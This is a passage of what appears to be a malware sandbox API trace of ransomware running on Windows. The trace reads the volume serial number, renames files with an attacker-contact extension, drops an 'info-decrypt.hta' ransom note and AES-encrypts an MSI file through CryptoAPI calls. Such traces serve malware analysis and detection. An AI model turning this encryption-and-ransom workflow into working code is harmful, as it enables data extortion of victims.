This=0xb5a934, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e680 | out: pCid=0x6c0e680*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0156.286] WbemLocator:IUnknown:Release (This=0xb5a934) returned 0x3 [0156.286] CoGetContextToken (in: pToken=0x6c0e6d8 | out: pToken=0x6c0e6d8) returned 0x0 [0156.286] CoGetContextToken (in: pToken=0x6c0eae0 | out: pToken=0x6c0eae0) returned 0x0 [0156.286] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eb70 | out: ppvObject=0x6c0eb70*=0xb5a9bc) returned 0x0 [0156.286] WbemLocator:IRpcOptions:Query (in: This=0xb5a9bc, pPrx=0xb5a9d4, dwProperty=2, pdwValue=0x6c0eb98 | out: pdwValue=0x6c0eb98) returned 0x80004002 [0156.286] WbemLocator:IUnknown:Release (This=0xb5a9bc) returned 0x3 [0156.286] WbemLocator:IUnknown:Release (This=0xb5a9d4) returned 0x2 [0156.286] CoGetContextToken (in: pToken=0x6c0f0b8 | out: pToken=0x6c0f0b8) returned 0x0 [0156.286] CoGetContextToken (in: pToken=0x6c0f018 | out: pToken=0x6c0f018) returned 0x0 [0156.286] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x6c0f0e8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6c0f0e4 | out: ppvObject=0x6c0f0e4*=0x602476c) returned 0x0 [0156.286] WbemLocator:IUnknown:AddRef (This=0x602476c) returned 0x4 [0156.286] WbemLocator:IUnknown:Release (This=0x602476c) returned 0x3 [0156.286] WbemLocator:IUnknown:Release (This=0x602476c) returned 0x2 [0156.287] SysStringLen (param_1=0x0) returned 0x0 [0156.287] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025d80, puCount=0x6c0f47c | out: puCount=0x6c0f47c*=0x0) returned 0x0 [0156.287] WbemDefPath:IWbemPath:GetText (in: This=0x6025d80, lFlags=2, puBuffLength=0x6c0f478*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f478*=0x20, pszText=0x0) returned 0x0 [0156.287] WbemDefPath:IWbemPath:GetText (in: This=0x6025d80, lFlags=2, puBuffLength=0x6c0f478*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f478*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0156.287] CoGetContextToken (in: pToken=0x6c0f0e8 | out: pToken=0x6c0f0e8) returned 0x0 [0156.287] WbemLocator:IUnknown:AddRef (This=0xb5a9d4) returned 0x3 [0156.287] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ef7c | out: ppvObject=0x6c0ef7c*=0xb5a9d4) returned 0x0 [0156.287] WbemLocator:IUnknown:Release (This=0xb5a9d4) returned 0x3 [0156.287] WbemLocator:IUnknown:Release (This=0xb5a9d4) returned 0x2 [0156.287] WbemDefPath:IWbemPath:GetText (in: This=0x6025d80, lFlags=2, puBuffLength=0x6c0f480*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f480*=0x20, pszText=0x0) returned 0x0 [0156.287] WbemDefPath:IWbemPath:GetText (in: This=0x6025d80, lFlags=2, puBuffLength=0x6c0f480*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f480*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0156.287] IWbemServices:GetObject (in: This=0x602476c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6c0f434*=0x0, ppCallResult=0x0 | out: ppObject=0x6c0f434*=0x6028648, ppCallResult=0x0) returned 0x0 [0157.011] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025df0, puCount=0x6c0f434 | out: puCount=0x6c0f434*=0x2) returned 0x0 [0157.011] WbemDefPath:IWbemPath:GetText (in: This=0x6025df0, lFlags=4, puBuffLength=0x6c0f430*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f430*=0xf, pszText=0x0) returned 0x0 [0157.011] WbemDefPath:IWbemPath:GetText (in: This=0x6025df0, lFlags=4, puBuffLength=0x6c0f430*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f430*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0157.011] IWbemClassObject:Get (in: This=0x6028648, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6c0f430*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x362ac28*=0, plFlavor=0x362ac2c*=0 | out: pVal=0x6c0f430*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x362ac28*=8, plFlavor=0x362ac2c*=0) returned 0x0 [0157.012] SysStringByteLen (bstr="9C354B42") returned 0x10 [0157.012] SysStringByteLen (bstr="9C354B42") returned 0x10 [0157.012] IWbemClassObject:Get (in: This=0x6028648, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6c0f438*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x362ac28*=8, plFlavor=0x362ac2c*=0 | out: pVal=0x6c0f438*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x362ac28*=8, plFlavor=0x362ac2c*=0) returned 0x0 [0157.012] SysStringByteLen (bstr="9C354B42") returned 0x10 [0157.012] SysStringByteLen (bstr="9C354B42") returned 0x10 [0157.012] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x6c0f038, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0157.012] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x6c0f038, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x6b [0157.012] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f498) returned 1 [0157.012] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x6c0f514 | out: lpFileInformation=0x6c0f514*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x19d29ae0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0157.012] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f494) returned 1 [0157.012] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0157.013] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f5dc) returned 1 [0157.013] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x6c0f0e4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0157.013] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x6c0f0b8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0157.013] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6c0f304 | out: lpFindFileData=0x6c0f304*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fa90 [0157.015] FindNextFileW (in: hFindFile=0xb7fa90, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0157.015] FindNextFileW (in: hFindFile=0xb7fa90, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe874f770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263400, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerPointMUI.msi", cAlternateFileName="POWERP~1.MSI")) returned 1 [0157.015] FindNextFileW (in: hFindFile=0xb7fa90, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerPointMUI.xml", cAlternateFileName="POWERP~1.XML")) returned 1 [0157.015] FindNextFileW (in: hFindFile=0xb7fa90, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8b079d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x431a290, dwReserved0=0x0, dwReserved1=0x0, cFileName="PptLR.cab", cAlternateFileName="")) returned 1 [0157.015] FindNextFileW (in: hFindFile=0xb7fa90, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x75e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0157.015] FindNextFileW (in: hFindFile=0xb7fa90, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0157.016] FindClose (in: hFindFile=0xb7fa90 | out: hFindFile=0xb7fa90) returned 1 [0157.017] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f59c) returned 1 [0157.017] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f5a8) returned 1 [0157.017] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f5dc) returned 1 [0157.017] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x6c0f0e4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0157.017] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x6c0f0b8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0157.017] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6c0f304 | out: lpFindFileData=0x6c0f304*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fa90 [0157.018] FindNextFileW (in: hFindFile=0xb7fa90, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0157.018] FindNextFileW (in: hFindFile=0xb7fa90, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe874f770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263400, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerPointMUI.msi", cAlternateFileName="POWERP~1.MSI")) returned 1 [0157.018] FindNextFileW (in: hFindFile=0xb7fa90, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerPointMUI.xml", cAlternateFileName="POWERP~1.XML")) returned 1 [0157.019] FindNextFileW (in: hFindFile=0xb7fa90, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8b079d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x431a290, dwReserved0=0x0, dwReserved1=0x0, cFileName="PptLR.cab", cAlternateFileName="")) returned 1 [0157.019] FindNextFileW (in: hFindFile=0xb7fa90, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x75e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0157.019] FindNextFileW (in: hFindFile=0xb7fa90, lpFindFileData=0x6c0f314 | out: lpFindFileData=0x6c0f314*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x75e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0157.019] FindClose (in: hFindFile=0xb7fa90 | out: hFindFile=0xb7fa90) returned 1 [0157.020] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f59c) returned 1 [0157.020] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f5a8) returned 1 [0157.020] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi", nBufferLength=0x105, lpBuffer=0x6c0f050, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi", lpFilePart=0x0) returned 0x50 [0157.020] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6c0f058, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", lpFilePart=0x0) returned 0x4f [0157.020] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f4b8) returned 1 [0157.020] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\info-decrypt.hta" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6c0f534 | out: lpFileInformation=0x6c0f534*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0157.021] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f4b4) returned 1 [0157.021] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi", nBufferLength=0x105, lpBuffer=0x6c0f050, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi", lpFilePart=0x0) returned 0x50 [0157.021] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6c0eef8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", lpFilePart=0x0) returned 0x4f [0157.021] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f3ec) returned 1 [0157.021] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\info-decrypt.hta" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c [0157.021] GetFileType (hFile=0x31c) returned 0x1 [0157.022] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f3e8) returned 1 [0157.022] GetFileType (hFile=0x31c) returned 0x1 [0157.022] WriteFile (in: hFile=0x31c, lpBuffer=0x362ecb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6c0f4b0, lpOverlapped=0x0 | out: lpBuffer=0x362ecb8*, lpNumberOfBytesWritten=0x6c0f4b0*=0x1000, lpOverlapped=0x0) returned 1 [0157.023] WriteFile (in: hFile=0x31c, lpBuffer=0x362ecb8*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x6c0f484, lpOverlapped=0x0 | out: lpBuffer=0x362ecb8*, lpNumberOfBytesWritten=0x6c0f484*=0x55e, lpOverlapped=0x0) returned 1 [0157.023] CloseHandle (hObject=0x31c) returned 1 [0157.024] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi", nBufferLength=0x105, lpBuffer=0x6c0f058, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi", lpFilePart=0x0) returned 0x50 [0157.024] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f504) returned 1 [0157.024] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi"), fInfoLevelId=0x0, lpFileInformation=0x362fcd4 | out: lpFileInformation=0x362fcd4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe874f770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263400)) returned 1 [0157.024] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f500) returned 1 [0157.024] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi", nBufferLength=0x105, lpBuffer=0x6c0ef44, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi", lpFilePart=0x0) returned 0x50 [0157.024] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f438) returned 1 [0157.024] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x31c [0157.025] GetFileType (hFile=0x31c) returned 0x1 [0157.025] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f434) returned 1 [0157.025] GetFileType (hFile=0x31c) returned 0x1 [0157.025] GetFileSize (in: hFile=0x31c, lpFileSizeHigh=0x6c0f540 | out: lpFileSizeHigh=0x6c0f540*=0x0) returned 0x263400 [0157.025] ReadFile (in: hFile=0x31c, lpBuffer=0x8146b10, nNumberOfBytesToRead=0x263400, lpNumberOfBytesRead=0x6c0f4ec, lpOverlapped=0x0 | out: lpBuffer=0x8146b10*, lpNumberOfBytesRead=0x6c0f4ec*=0x263400, lpOverlapped=0x0) returned 1 [0157.487] CloseHandle (hObject=0x31c) returned 1 [0157.487] CryptAcquireContextW (in: phProv=0x6c0f48c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6c0f48c*=0xbe0b58) returned 1 [0157.488] CryptGenRandom (in: hProv=0xbe0b58, dwLen=0x10, pbBuffer=0x363026c | out: pbBuffer=0x363026c) returned 1 [0158.273] CryptImportKey (in: hProv=0xbe0b58, pbData=0x37083d0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6c0f45c | out: phKey=0x6c0f45c*=0xb7fc50) returned 1 [0158.273] CryptContextAddRef (hProv=0xbe0b58, pdwReserved=0x0, dwFlags=0x0) returned 1 [0158.273] CryptContextAddRef (hProv=0xbe0b58, pdwReserved=0x0, dwFlags=0x0) returned 1 [0158.273] CryptDuplicateKey (in: hKey=0xb7fc50, pdwReserved=0x0, dwFlags=0x0, phKey=0x6c0f44c | out: phKey=0x6c0f44c*=0xb7f010) returned 1 [0158.273] CryptContextAddRef (hProv=0xbe0b58, pdwReserved=0x0, dwFlags=0x0) returned 1 [0158.273] CryptSetKeyParam (hKey=0xb7f010, dwParam=0x4, pbData=0x37084b0*=0x1, dwFlags=0x0) returned 1 [0158.273] CryptSetKeyParam (hKey=0xb7f010, dwParam=0x1, pbData=0x370847c, dwFlags=0x0) returned 1 [0158.286] CryptEncrypt (in: hKey=0xb7f010, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xa4d0cf8*, pdwDataLen=0x6c0f4b8*=0x263410, dwBufLen=0x263410 | out: pbData=0xa4d0cf8*, pdwDataLen=0x6c0f4b8*=0x263410) returned 1 [0158.309] CryptEncrypt (in: hKey=0xb7f010, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37084d8*, pdwDataLen=0x6c0f4c0*=0x0, dwBufLen=0x10 | out: pbData=0x37084d8*, pdwDataLen=0x6c0f4c0*=0x10) returned 1 [0158.310] CryptDestroyKey (hKey=0xb7fc50) returned 1 [0158.310] CryptReleaseContext (hProv=0xbe0b58, dwFlags=0x0) returned 1 [0158.310] CryptReleaseContext (hProv=0xbe0b58, dwFlags=0x0) returned 1 [0158.310] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi", nBufferLength=0x105, lpBuffer=0x6c0ef30, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi", lpFilePart=0x0) returned 0x50 [0158.310] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f424) returned 1 [0158.310] CreateFileW (lpFileName="C:\\MSOCache\\All 